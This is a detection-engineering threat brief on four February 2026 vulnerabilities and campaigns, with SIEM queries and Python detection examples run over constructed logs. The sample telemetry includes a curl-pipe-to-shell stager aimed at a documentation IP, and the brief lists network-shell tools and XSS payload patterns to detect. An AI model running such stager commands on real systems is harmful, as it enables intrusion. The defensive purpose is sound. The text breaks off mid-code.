Cyber Threat Brief — February 25, 2026
Window: February 24–25, 2026 | Audience: Detection Engineers
Detection Engineering Brief | Wednesday, February 25, 2026 | 05:00 PT
1. CVE-2026-25108 — FileZen OS Command Injection (CISA KEV, Active Exploitation)
What’s New
CISA added CVE-2026-25108 to the Known Exploited Vulnerabilities catalog on February 24, 2026, after Soliton Systems confirmed receiving “multiple reports of damage” from exploitation in the wild. Timing correlation with a ransomware incident at Japan’s Washington Hotel suggests the flaw may already be weaponized for pre-ransomware access.
Technical Details
| Field | Value |
|---|---|
| CVE | CVE-2026-25108 |
| CVSS | 8.7 (CVSSv4) |
| Affected | FileZen v4.2.1–4.2.8, v5.0.0–v5.0.10 (physical & virtual) |
| Exploit | Confirmed in-the-wild; no public PoC |
| Vendor | Soliton Systems K.K. (Tokyo-based, government/enterprise customer base) |
| Patch | Upgrade to v5.0.11 or later |
| FCEB Deadline | March 17, 2026 |
Root Cause: OS command injection via a specially crafted HTTP POST request to a specific field on the post-login admin screen. The vulnerability is only exploitable when the FileZen Antivirus Check Option is enabled. Does not affect FileZen S.
Access Requirements: Authenticated, low-privileged user account (general user tier). The attacker must either compromise an existing account via phishing/credential spray or guess credentials.
Forensic Note: FileZen’s file-monitoring feature for system directories logs file modifications — if the system directory files were altered during exploitation, those logs should contain evidence.
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1190 — Exploit Public-Facing App | HTTP POST requests to FileZen admin panel from unusual IPs |
| Execution | T1059.004 — Unix Shell | OS command spawned from web server process (java/nginx/apache) |
| Initial Access / Persistence | T1078 — Valid Accounts | Login with a general-tier account followed by admin-level behavior (exploitation requires a valid low-privilege account) |
| Impact | T1486 — Data Encrypted for Impact | Ransomware deployment post-exploitation (unconfirmed, circumstantial) |
Detection Opportunities
# Web server spawning shell processes (FileZen ships as a Linux appliance; Windows shells omitted)
process.parent.name IN ("java", "nginx", "httpd", "apache2", "python")
AND process.name IN ("sh", "bash", "dash")
AND event.type = "process_start"
# Authenticated HTTP POST to the FileZen admin screen
# Soliton has not published the vulnerable endpoint; the path fragments below are placeholders to be replaced with the admin-screen URLs of your own deployment
http.request.method = "POST"
AND (url.path CONTAINS "/fileupload" OR url.path CONTAINS "/antivirus")
AND http.response.status_code IN (200, 302)
AND source.ip NOT IN [known_admin_IPs]
# FileZen system directory file modification (requires the file-monitoring feature; the path is a placeholder)
file.path CONTAINS "/opt/filezen/system/" AND event.type = "change"
# Password reset storm (post-compromise indicator)
# Multiple user password changes in a short window initiated from the FileZen admin screen
Investigate: Examine FileZen access logs for the timeframe around the suspicious activity. Look for:
- Logins with general user accounts followed by unexpected admin operations
- HTTP requests with unusual character encoding in form fields
- New processes spawned by the FileZen JVM/web server
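Worked example, added here and not part of the original brief or of Soliton's code: the web-tier-shell check, the general-user-then-admin-operation check and the password-reset-storm check above, run over constructed EDR process events and a constructed FileZen-style access log. The event field names, the access-log line format and the account "tier" column are assumptions; Soliton has not published the log format or the vulnerable endpoint, so nothing here encodes the actual exploit request.

```python
"""Added example (not from the brief, not Soliton code): FileZen detection
ideas over constructed data. The EDR event fields, the access-log format
'<ts> <user> <tier> <action> <src_ip>' and the tier column are assumptions."""
from dataclasses import dataclass
from datetime import datetime, timedelta

WEB_TIER_PARENTS = {"java", "nginx", "httpd", "apache2", "python", "python3"}
SHELLS = {"sh", "bash", "dash"}
# Common ways a shell launched from the web tier fetches or runs a second stage.
STAGER_MARKERS = ("curl ", "wget ", "nc ", "ncat ", "/dev/tcp/", "base64 -d", "chmod +x")
# Operations a general-tier account should never perform on the appliance.
ADMIN_ACTIONS = {"user_create", "user_password_reset",
                 "antivirus_config_update", "system_setting_change"}


@dataclass
class ProcEvent:
    ts: datetime
    parent_name: str
    name: str
    args: str
    user: str


def shell_from_web_tier(events):
    """(event, severity) for every shell whose parent is a web-tier process."""
    hits = []
    for e in events:
        if e.parent_name in WEB_TIER_PARENTS and e.name in SHELLS:
            severity = "high" if any(m in e.args for m in STAGER_MARKERS) else "medium"
            hits.append((e, severity))
    return hits


def parse_access_log(text):
    rows = []
    for line in text.strip().splitlines():
        ts, user, tier, action, src_ip = line.split()
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, tier, action, src_ip))
    return rows


def general_user_admin_ops(text):
    """General-tier accounts performing admin-only operations: (user, action, src_ip)."""
    return [(user, action, src_ip)
            for _ts, user, tier, action, src_ip in parse_access_log(text)
            if tier == "general" and action in ADMIN_ACTIONS]


def password_reset_storm(text, threshold=5, window=timedelta(minutes=10)):
    """{actor: max resets in any sliding window} for actors at or above threshold."""
    resets = {}
    for ts, user, _tier, action, _src in parse_access_log(text):
        if action == "user_password_reset":
            resets.setdefault(user, []).append(ts)
    storms = {}
    for user, times in resets.items():
        times.sort()
        left = 0
        for right, t in enumerate(times):
            while t - times[left] > window:
                left += 1
            count = right - left + 1
            if count >= threshold:
                storms[user] = max(storms.get(user, 0), count)
    return storms


# ---- constructed sample data (not real telemetry; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges) ----
T0 = datetime(2026, 2, 24, 3, 12, 0)
PROC_EVENTS = [
    ProcEvent(T0, "java", "java", "java -jar app.jar", "filezen"),                       # not a shell
    ProcEvent(T0 + timedelta(seconds=2), "java", "sh",
              "sh -c 'curl http://203.0.113.5/s.sh | sh'", "filezen"),                    # high: stager
    ProcEvent(T0 + timedelta(seconds=30), "cron", "sh", "sh /etc/cron.daily/logrotate", "root"),  # not web tier
    ProcEvent(T0 + timedelta(seconds=45), "nginx", "bash", "bash -c id", "www-data"),     # medium
]
ACCESS_LOG = """\
2026-02-24T03:12:01Z alice general login 198.51.100.7
2026-02-24T03:12:40Z alice general upload 198.51.100.7
2026-02-24T03:13:02Z alice general antivirus_config_update 198.51.100.7
2026-02-24T03:20:00Z admin admin login 10.0.0.5
2026-02-24T03:20:05Z admin admin user_password_reset 10.0.0.5
2026-02-24T03:20:06Z admin admin user_password_reset 10.0.0.5
2026-02-24T03:20:07Z admin admin user_password_reset 10.0.0.5
2026-02-24T03:20:08Z admin admin user_password_reset 10.0.0.5
2026-02-24T03:20:09Z admin admin user_password_reset 10.0.0.5
2026-02-24T03:20:10Z admin admin user_password_reset 10.0.0.5
2026-02-24T04:05:00Z helpdesk admin user_password_reset 10.0.0.6
"""

if __name__ == "__main__":
    for e, sev in shell_from_web_tier(PROC_EVENTS):
        print(f"[{sev}] {e.parent_name} -> {e.name}: {e.args}")
    print(general_user_admin_ops(ACCESS_LOG))
    print(password_reset_storm(ACCESS_LOG))
```

The severity split matters in practice: a web server spawning a shell is common enough on appliances running maintenance scripts that the medium tier belongs in a hunting dashboard, while a shell that immediately fetches a second stage deserves a page. The reset-storm counter uses a sliding window rather than fixed buckets so a burst straddling a minute boundary is not split in two.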
Log Sources
- FileZen access logs (system directory file monitoring)
- Web application firewall logs
- EDR (process creation from web server parent)
- Network flow logs (C2 callbacks post-exploitation)
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No FileZen-specific rules |
| Splunk ESCU | ❌ Gap — No FileZen rule; the closest content is the generic Ivanti Connect Secure Command Injection Attempts pattern |
| Elastic | ⚠️ Partial — Web Server Potential Command Injection Request (generic) |
| KQL | ❌ Gap |
Recommendation: Create a Sigma rule for web server spawning unexpected OS shells, and monitor FileZen-specific log paths if deployed.
Sources
- Help Net Security — CISA flags FileZen CVE-2026-25108 — Published February 25, 2026
- The Hacker News — CISA Confirms Active Exploitation — Published February 25, 2026
- JPCERT/CC Advisory JVN84622767 — Published February 24, 2026
2. SolarWinds Serv-U 15.5 — Four Critical RCEs (CVE-2025-40538/39/40/41)
What’s New
SolarWinds published a security advisory and the Serv-U 15.5.4 release notes on February 24, 2026, addressing a cluster of four critical vulnerabilities, all rated CVSS 9.1. No in-the-wild exploitation has been reported yet, but Serv-U has an extensive exploitation history (CVE-2021-35211 exploited by the China-linked actor Storm-0322; CVE-2024-28995 mass-exploited), which makes rapid weaponization likely.
Technical Details
| Field | Value |
|---|---|
| CVE | CVE-2025-40538, CVE-2025-40539, CVE-2025-40540, CVE-2025-40541 |
| CVSS | 9.1 (Critical) — all four |
| Affected | SolarWinds Serv-U version 15.5 (FTP Server + MFT editions) |
| Platforms | Windows, Linux |
| Exploit | No public PoC; attack chain documented in advisory |
| Patch | Upgrade to Serv-U 15.5.4 |
CVE-by-CVE:
| CVE | Type | Impact |
|---|---|---|
| CVE-2025-40538 | Broken Access Control | Create system admin user → arbitrary code as root via domain/group admin |
| CVE-2025-40539 | Type Confusion | Execute arbitrary native code as root |
| CVE-2025-40540 | Type Confusion | Execute arbitrary native code as root |
| CVE-2025-40541 | IDOR (Insecure Direct Object Reference) | Execute native code as root |
Important caveat: All four require existing admin-level credentials within Serv-U itself (a Serv-U domain administrator or group administrator, which are application roles, not Active Directory roles). Risk amplifier: admin credentials compromised via phishing, password reuse, or credential spraying make these escalation paths immediately exploitable. Linux deployments are the worst case because Serv-U runs as root there; Windows deployments are less critical because Serv-U typically runs as a less-privileged service account.
Orca Security researchers (credited for discovery) note: “In real-world scenarios where administrative credentials are compromised — through phishing, password reuse, or credential spraying — they significantly increase the impact of that compromise.”
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Privilege Escalation | T1078 — Valid Accounts | Serv-U domain/group admin account used to create a new server-level admin user |
| Execution | T1059 — Command and Scripting | Unexpected process spawning from Serv-U service |
| Credential Access | T1110.003 — Password Spraying | Admin credential compromise preceding exploitation |
| Persistence | T1098 — Account Manipulation | New administrator account created in Serv-U |
| Privilege Escalation | T1068 — Exploitation for Privilege Escalation | Serv-U process (root on Linux) executing unexpected native code or system commands |
Detection Opportunities
# New Serv-U administrator created
# Serv-U user and admin accounts are application objects, not OS accounts, so the primary source is
# Serv-U's own log/config-change records (field names depend on how you ingest them). Windows 4720 or
# Linux useradd only fire if the attacker goes on to create an OS account after gaining code execution.
servu.message CONTAINS "administrator" AND servu.message CONTAINS "created"
# OS account creation with Serv-U as the parent process (post-RCE)
(EventID = 4720 OR process.name IN ("useradd", "usermod"))
AND process.parent.name IN ("ServU.exe", "Serv-U.exe", "servud")
# Unexpected privileged child process of Serv-U
process.parent.name IN ("ServU.exe", "Serv-U.exe", "servud")
AND process.name IN ("cmd.exe", "powershell.exe", "sh", "bash")
AND NOT process.args CONTAINS [known_legit_args]
# Post-exploitation: Serv-U initiating outbound connections to non-peer destinations
# (client sessions are inbound; an outbound connection from the service process is the anomaly)
network.direction = "outbound"
AND process.name IN ("ServU.exe", "Serv-U.exe", "servud")
AND network.destination.ip NOT IN [known_ftp_sftp_peers]
# Credential spray targeting Serv-U (FTP/SFTP/HTTPS auth failures)
event.action = "authentication_failure"
AND service.name IN ("Serv-U", "FTP", "SFTP")
AND count() BY source.ip > 50 WITHIN 5m
AND distinct_count(user.name) BY source.ip > 5   # many accounts from one source = spray; one account = brute force
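Worked example, added here and not part of the original brief or of SolarWinds' code: the spray query above extended into the chain the caveat describes, a credential spray against the file-transfer service, a later successful login from the spraying source, and that account creating a new Serv-U administrator. The log line format (`<ts> <EVENT> <user> <src_ip> [k=v ...]`), the event names and the thresholds are assumptions; Serv-U's real log format differs, so map fields at ingestion time.

```python
"""Added example (not from the brief, not SolarWinds code). Correlates
credential spray -> login from the spraying source -> Serv-U admin creation.
Log format '<ts> <EVENT> <user> <src_ip> [k=v ...]' and event names are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_servu_log(text):
    events = []
    for line in text.strip().splitlines():
        parts = line.split()
        ev = {"ts": datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ"),
              "event": parts[1], "user": parts[2], "src": parts[3]}
        for kv in parts[4:]:                      # optional key=value fields
            key, _, val = kv.partition("=")
            ev[key] = val
        events.append(ev)
    return events


def spraying_sources(events, threshold=50, window=timedelta(minutes=5), min_users=5):
    """Source IPs with >= threshold auth failures inside one sliding window,
    spread over >= min_users accounts. The distinct-user floor separates a
    spray from a single-account brute force, which is a different alert."""
    fails = defaultdict(list)
    for e in events:
        if e["event"] == "AUTH_FAIL":
            fails[e["src"]].append((e["ts"], e["user"]))
    verdicts = {}
    for src, items in fails.items():
        items.sort()
        left = 0
        for right, (ts, _user) in enumerate(items):
            while ts - items[left][0] > window:
                left += 1
            in_window = items[left:right + 1]
            users = {u for _, u in in_window}
            if len(in_window) >= threshold and len(users) >= min_users:
                best = verdicts.get(src, {"failures": 0})
                if len(in_window) > best["failures"]:
                    verdicts[src] = {"failures": len(in_window), "distinct_users": len(users)}
    return verdicts


def spray_to_admin_chain(events, lookahead=timedelta(minutes=30)):
    """(src_ip, account, new_admin) where a sprayed source later logs in
    successfully and that account creates a Serv-U admin within `lookahead`."""
    sprayers = spraying_sources(events)
    chains = []
    for ok in events:
        if ok["event"] != "AUTH_OK" or ok["src"] not in sprayers:
            continue
        for adm in events:
            if (adm["event"] == "ADMIN_CREATE" and adm["user"] == ok["user"]
                    and ok["ts"] <= adm["ts"] <= ok["ts"] + lookahead):
                chains.append((ok["src"], ok["user"], adm.get("new_admin")))
    return chains


# ---- constructed sample log (not real telemetry; 203.0.113.0/24 is a documentation range) ----
_SPRAY = [f"2026-02-24T08:{i // 15:02d}:{(i % 15) * 4:02d}Z AUTH_FAIL user{i % 20:02d} 203.0.113.9"
          for i in range(60)]                     # 60 failures, 20 accounts, under 4 minutes
SERVU_LOG = "\n".join(_SPRAY + [
    "2026-02-24T08:01:00Z AUTH_FAIL dave 10.0.0.8",       # one user mistyping, not a spray
    "2026-02-24T08:01:05Z AUTH_FAIL dave 10.0.0.8",
    "2026-02-24T08:01:20Z AUTH_OK dave 10.0.0.8",
    "2026-02-24T08:05:10Z AUTH_OK carol 203.0.113.9",      # the sprayed source gets in
    "2026-02-24T08:06:00Z ADMIN_CREATE carol 203.0.113.9 new_admin=svc_backup",
    "2026-02-24T09:00:00Z ADMIN_CREATE admin 10.0.0.5 new_admin=oncall",  # legitimate change
])
EVENTS = parse_servu_log(SERVU_LOG)

if __name__ == "__main__":
    print(spraying_sources(EVENTS))
    print(spray_to_admin_chain(EVENTS))
```

Keying the spray on source IP and requiring a spread of accounts keeps the legitimate `oncall` admin creation and the single fat-fingered user out of the result; the chain only fires for an account whose successful login came from a source that was spraying minutes earlier.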
Log Sources
- SolarWinds Serv-U application logs
- Windows Event Log (4720, 4728, 4732 — account/group changes)
- EDR process creation
- Syslog (Linux — PAM auth, useradd)
- Network flow logs (FTP 21, SFTP 22, FTPS 990)
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No Serv-U-specific rules for these CVEs |
| Splunk ESCU | ❌ Gap — No file transfer server RCE detection |
| Elastic | ⚠️ Partial — File Transfer Utility Launched from Unusual Parent (generic) |
| KQL | ❌ Gap |
Recommendation: Monitor SolarWinds Serv-U logs for unexpected admin account creation. Given the exploitation history of Serv-U, prioritize patching to 15.5.4 immediately.
Sources
- Help Net Security — Serv-U four critical RCEs — Published February 25, 2026
- The Hacker News — SolarWinds Patches 4 Critical Serv-U Flaws — Published February 25, 2026
3. Lazarus Group × Medusa Ransomware — Healthcare & Middle East Targeting
What’s New
Symantec’s Threat Hunter Team (Broadcom) published research on February 24, 2026 revealing North Korean Lazarus Group affiliates are now operating as Medusa ransomware-as-a-service affiliates. This is the first confirmed link between Lazarus and Medusa. Four U.S. healthcare and nonprofit organizations were claimed on Medusa’s leak site since November 2025, including a mental health nonprofit and an educational facility for autistic children.
Technical Details
| Field | Value |
|---|---|
| Threat Actor | Lazarus Group (subgroup: Andariel/Stonefly — possibly also Diamond Sleet overlap) |
| Ransomware | Medusa RaaS (operated by “Spearwing”) |
| Targets | U.S. healthcare organizations, Middle East entity |
| Average Ransom | $260,000 |
| Total Medusa Claims | 366+ attacks since 2023 launch |
| IOCs | Provided by Symantec (network infra + file hashes) |
Toolset observed in Lazarus-linked Medusa attacks:
| Tool | Type | Attribution |
|---|---|---|
| Comebacker | Custom backdoor/loader | Lazarus-exclusive |
| Blindingcan | Remote Access Trojan | Lazarus-exclusive |
| ChromeStealer | Chrome credential extractor | Lazarus-linked |
| Infohook | Information stealer | Lazarus-linked |
| Mimikatz | Credential dumping | Commodity |
| RP_Proxy | Custom proxy tool | Lazarus-linked |
| Curl | Data transfer | Commodity |
Strategic context: Lazarus (via Stonefly/Andariel) uses ransomware proceeds to fund espionage operations targeting U.S., Taiwan, and South Korean defense/government/tech sectors. The July 2025 U.S. DOJ indictment of Rim Jong Hyok (RGB/Stonefly) for healthcare ransomware attacks did not deter operations.
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1566 — Phishing | Spear phishing leading to Comebacker execution |
| Execution | T1059.003 — Windows Command Shell | Comebacker/Blindingcan command execution |
| Credential Access | T1555.003 — Browser Credentials | ChromeStealer targeting Chrome Login Data db |
| Credential Access | T1003.001 — LSASS Memory | Mimikatz process injection |
| Collection | T1113 — Screen Capture | Infohook screenshot capabilities |
| Command & Control | T1090.002 — External Proxy | RP_Proxy for encrypted C2 routing |
| Exfiltration | T1041 — Exfiltration Over C2 | Curl-based data staging/transfer |
| Impact | T1486 — Data Encrypted for Impact | Medusa ransomware deployment |
Detection Opportunities
# ChromeStealer: non-browser process reading Chrome's credential store
file.path CONTAINS "\\Google\\Chrome\\User Data\\"
AND file.name IN ("Login Data", "Login Data For Account")
AND process.name NOT IN ("chrome.exe", "chromium.exe", "msedge.exe", "opera.exe")
AND event.type IN ("open", "read")
# Comebacker/Blindingcan: loader/backdoor characteristics (Sysmon Event ID 7 image load)
# Unsigned DLL loaded by a process that lives in system32 (masquerading as a Windows component)
EventID = 7
AND ImageLoaded ENDS WITH ".dll"
AND Signed = "false"
AND Image CONTAINS "\\system32\\"
AND NOT ImageLoaded IN [known_unsigned_dlls]
# Mimikatz: LSASS handle with memory-read rights (Sysmon Event ID 10)
# Test the bits, not exact values: 0x1010 and 0x1410 are the classic Mimikatz masks, but any
# mask with PROCESS_VM_READ (0x0010) set is of interest, including PROCESS_ALL_ACCESS (0x1FFFFF)
EventID = 10
AND TargetImage ENDS WITH "\\lsass.exe"
AND SourceImage NOT IN [known_security_tools, "\\csrss.exe", "\\wininit.exe", "\\MsMpEng.exe"]
AND (GrantedAccess & 0x0010) != 0
# RP_Proxy: long-lived outbound connections on TLS/proxy ports from non-browser, non-updater processes
# Tune the exclusion list per environment; this is a hunting query, not an alert
network.direction = "outbound"
AND network.destination.port IN (443, 8443, 8080)
AND process.name NOT IN ("chrome.exe", "firefox.exe", "msedge.exe", [known_updaters_and_agents])
AND network.bytes_out > 100000
# Infohook: screenshot capture by an unexpected process (requires EDR API telemetry)
(event.api_call IN ("BitBlt", "PrintWindow") AND process.name NOT IN ("dwm.exe", "SnippingTool.exe", [known_collab_tools]))
OR (process.args CONTAINS "screenshot" AND process.name NOT IN ("SnippingTool.exe"))
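Worked example, added here and not part of the original brief or of Symantec's or any vendor's code: the LSASS-access check above implemented over constructed Sysmon Event ID 10 (ProcessAccess) records. The point it makes is to test the access-mask bits rather than matching the exact values 0x1010 and 0x1410; those are the classic Mimikatz masks, but a tool that requests PROCESS_ALL_ACCESS (0x1FFFFF) also holds PROCESS_VM_READ and would slip past an exact-value rule. The sample records and the allowlist are constructed; the allowlist is the part to tune per environment.

```python
"""Added example (not from the brief, not vendor code): LSASS-access detection
over constructed Sysmon Event ID 10 records, testing access-mask bits."""
# Windows process access rights (winnt.h)
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
# Rights that let a process read or tamper with LSASS memory. Query-only handles
# (0x1000 / 0x1400) are what Task Manager and inventory tools open; they are ignored.
DUMP_OR_INJECT = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD

# Full-path allowlist (assumed for the example): a copy of svchost.exe outside
# System32 does not match, which is the renamed-binary case.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def lsass_access_hits(records):
    """Return (SourceImage, GrantedAccess, reason) for suspicious LSASS handles."""
    hits = []
    for r in records:
        if not r["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        source = r["SourceImage"].lower()
        granted = int(r["GrantedAccess"], 16)
        reasons = []
        if granted & DUMP_OR_INJECT:
            reasons.append("memory read/write/thread rights on lsass")
        # Sysmon writes UNKNOWN for call-stack frames in unbacked memory
        # (shellcode, reflectively loaded code), regardless of the mask.
        if "UNKNOWN" in r.get("CallTrace", ""):
            reasons.append("unbacked caller in CallTrace")
        if reasons and source not in ALLOWED_SOURCES:
            hits.append((r["SourceImage"], r["GrantedAccess"], "; ".join(reasons)))
    return hits


# ---- constructed Sysmon EID 10 records (not real telemetry) ----
SAMPLE_RECORDS = [
    {"SourceImage": r"C:\Users\j\AppData\Local\Temp\x.exe",           # classic mimikatz mask
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Users\j\AppData\Local\Temp\x.exe+1f3a"},
    {"SourceImage": r"C:\Windows\Temp\svchost.exe",                    # renamed, outside System32
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\Temp\svchost.exe+22b0"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe",                # query-only, benign
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\taskmgr.exe+5a10"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",  # allowlisted AV engine
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Program Files\Windows Defender\MsMpEng.exe+1c0"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe",               # injected code, unbacked frame
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4e4|UNKNOWN(000001F3A4C2000)"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe",                # real svchost, query only
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1400",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\svchost.exe+8f2"},
]

if __name__ == "__main__":
    for src, mask, why in lsass_access_hits(SAMPLE_RECORDS):
        print(f"{mask:>9} {src}: {why}")
```

Allowlisting the real System32 svchost.exe is a deliberate trade-off: it removes a large source of noise but also means an attacker who injects into a genuine svchost is only caught by the CallTrace branch, which is why that branch is evaluated independently of the mask.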
Log Sources
- EDR (process creation, DLL loading, LSASS access)
- Sysmon Event IDs: 1 (process), 7 (image load), 10 (process access), 11 (file create)
- Windows Event Log: 4688 (process creation), 4656 (object access)
- Web proxy / firewall logs (C2 callbacks)
- File integrity monitoring on Chrome profile paths
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ✅ Mimikatz DC Sync, Mimikatz Use, HackTool - Mimikatz Execution — Mimikatz covered |
| Sigma | ✅ Suspicious File Access to Browser Credential Storage — ChromeStealer covered |
| Sigma | ❌ Gap — No Comebacker/Blindingcan/Infohook/RP_Proxy specific rules |
| Splunk ESCU | ⚠️ Linux Medusa Rootkit — detects the Medusa Linux LKM rootkit, an unrelated project; it is not coverage for Medusa ransomware |
| Splunk ESCU | ❌ Gap — No Comebacker/Blindingcan rules |
| Elastic | ✅ Ransomware - Detected - Elastic Defend — Generic ransomware |
| KQL | ❌ Gap |
Recommendation: Lazarus-specific tooling (Comebacker, Blindingcan, Infohook) requires custom YARA/Sigma rules based on IOCs from the Symantec report. Priority: healthcare SOCs should enable ChromeStealer and LSASS access detections immediately.
Sources
- Symantec/Broadcom Threat Intelligence — Lazarus Medusa Ransomware — Published February 24, 2026
- BleepingComputer — North Korean Lazarus group linked to Medusa — Published February 24, 2026
- The Hacker News — Lazarus Group Uses Medusa Ransomware — Published February 24, 2026
4. VMware Aria Operations — VMSA-2026-0001 (RCE + XSS + Privilege Escalation)
What’s New
Broadcom released VMSA-2026-0001 on February 24, 2026 addressing three vulnerabilities in VMware Aria Operations. The most severe (CVE-2026-22719, CVSS 8.1) allows unauthenticated remote code execution during support-assisted product migrations. This affects VMware Cloud Foundation 4.x/5.x/9.x and Telco Cloud Platform environments — widely deployed in enterprise and telecom infrastructure.
Technical Details
| CVE | CVSS | Type | Auth | Description |
|---|---|---|---|---|
| CVE-2026-22719 | 8.1 | Command Injection → RCE | None | Exploitable during migration support windows; workaround KB430349 available |
| CVE-2026-22720 | 8.0 | Stored XSS | Low (Privileged user) | Custom benchmark creation → admin script execution; no workaround |
| CVE-2026-22721 | 6.2 | Privilege Escalation | High (vCenter) | vCenter-privileged actors gain Aria Operations admin access |
Affected Products:
| Product | Affected Versions | Fixed Version |
|---|---|---|
| VMware Aria Operations | 8.x | 8.18.6 |
| VMware Cloud Foundation (VCF) | 9.x | 9.0.2.0 |
| VMware Cloud Foundation | 5.x, 4.x | KB92148 |
| VMware Telco Cloud Platform | 5.x, 4.x | KB428241 |
| VMware Telco Cloud Infrastructure | 3.x, 2.x | KB428241 |
CVE-2026-22719 Attack Vector: Exploitable only during support-assisted migrations — this implies either a specific time window or that attacker-controlled migration triggers could be induced. The unauthenticated nature (AV:N/AC:H/PR:N) makes it particularly dangerous if that migration state can be triggered externally.
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1190 — Exploit Public-Facing App | Unauthenticated requests to Aria Operations API during migration |
| Execution | T1059 — Command and Scripting | OS commands executed from Aria Operations service account |
| Privilege Escalation | T1548 — Abuse Elevation Control | vCenter account → Aria Operations admin |
| Persistence | T1505.003 — Web Shell | Post-RCE web shell placement in Aria Operations web root |
| Collection | T1185 — Browser Session Hijacking | Stored XSS executing in an admin's Aria Operations session to read monitoring data/credentials |
Detection Opportunities
# CVE-2026-22719: unexpected child process of the Aria Operations services
(process.parent.name IN ("vmware-vcops", "analytix", "casa") OR process.parent.name STARTS WITH "vcops")
AND process.name IN ("sh", "bash", "python", "wget", "curl")
AND NOT process.args CONTAINS [known_migration_scripts]
# CVE-2026-22720: stored XSS payload in benchmark/policy definitions submitted to the suite API
# Decode URL and HTML encoding before matching; literal string matches alone are trivially bypassed
http.request.method IN ("POST", "PUT", "PATCH")
AND (http.request.uri CONTAINS "/suite-api/api/policy" OR http.request.uri CONTAINS "/suite-api/api/alertdefinitions")
AND decoded(http.request.body) CONTAINS ANY ("<script", "javascript:", "onerror=", "onload=")
# CVE-2026-22721: vCenter identity obtaining Aria Operations admin rights
# Unexpected admin session from a vCenter service account
event.action = "login"
AND (user.name CONTAINS "vcsystemaccount" OR user.name CONTAINS "vcenter")
AND destination.service = "aria-operations-admin"
# Post-exploitation: lateral movement from monitoring infrastructure
# Aria Ops has visibility into every monitored VM and is a high-value pivot point
process.parent.name STARTS WITH "vcops"
AND network.direction = "outbound"
AND network.destination.ip NOT IN [known_monitored_endpoints, aria_ops_server]
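Worked example, added here and not part of the original brief or of Broadcom/VMware code: the stored-XSS request check above, with the decoding step that the literal `CONTAINS` match in a SIEM query lacks. JSON string values are extracted, URL-decoded until stable, HTML-entity-decoded, and stripped of control characters that browsers ignore inside tokens, so a double-encoded `%253Cscript` or a `java<TAB>script:` still matches. The request objects, the handler-attribute list and the scope rule are assumptions for the example; `/suite-api/` is the Aria Operations API prefix from the queries above.

```python
"""Added example (not from the brief, not VMware code): stored-XSS request
scanning with decoding normalization. Request objects and patterns are assumptions."""
import html
import json
import re
from urllib.parse import unquote

HANDLERS = "error|load|click|mouseover|focus|toggle|animationstart|pointerover"
XSS_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"<\s*script\b",
    r"javascript\s*:",
    rf"\bon(?:{HANDLERS})\s*=",
    r"<\s*(?:svg|iframe|img|object|embed|math)\b",
    r"srcdoc\s*=",
)]
IN_SCOPE_PREFIX = "/suite-api/"        # Aria Operations REST API prefix
WRITE_METHODS = {"POST", "PUT", "PATCH"}


def normalize(value: str) -> str:
    """Decode nested URL/HTML encodings until the string stops changing, then
    drop control characters that browsers ignore inside tokens."""
    previous = None
    while previous != value:
        previous = value
        value = html.unescape(unquote(value))
    return re.sub(r"[\x00-\x1f\x7f]", "", value)


def walk_strings(obj):
    """Yield every string value inside parsed JSON (or the raw body if not JSON)."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from walk_strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from walk_strings(v)


def scan_request(req):
    """Return [(matched_token, decoded_value)] for in-scope write requests."""
    if req["method"] not in WRITE_METHODS or not req["path"].startswith(IN_SCOPE_PREFIX):
        return []
    try:
        payload = json.loads(req["body"])
    except ValueError:
        payload = req["body"]
    findings = []
    for raw in walk_strings(payload):
        decoded = normalize(raw)
        for pattern in XSS_PATTERNS:
            match = pattern.search(decoded)
            if match:
                findings.append((match.group(0), decoded[:80]))
    return findings


def scan_all(requests):
    return [bool(scan_request(r)) for r in requests]


# ---- constructed requests (not captured traffic; 203.0.113.0/24 is a documentation range) ----
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/suite-api/api/policy",              # benign benchmark
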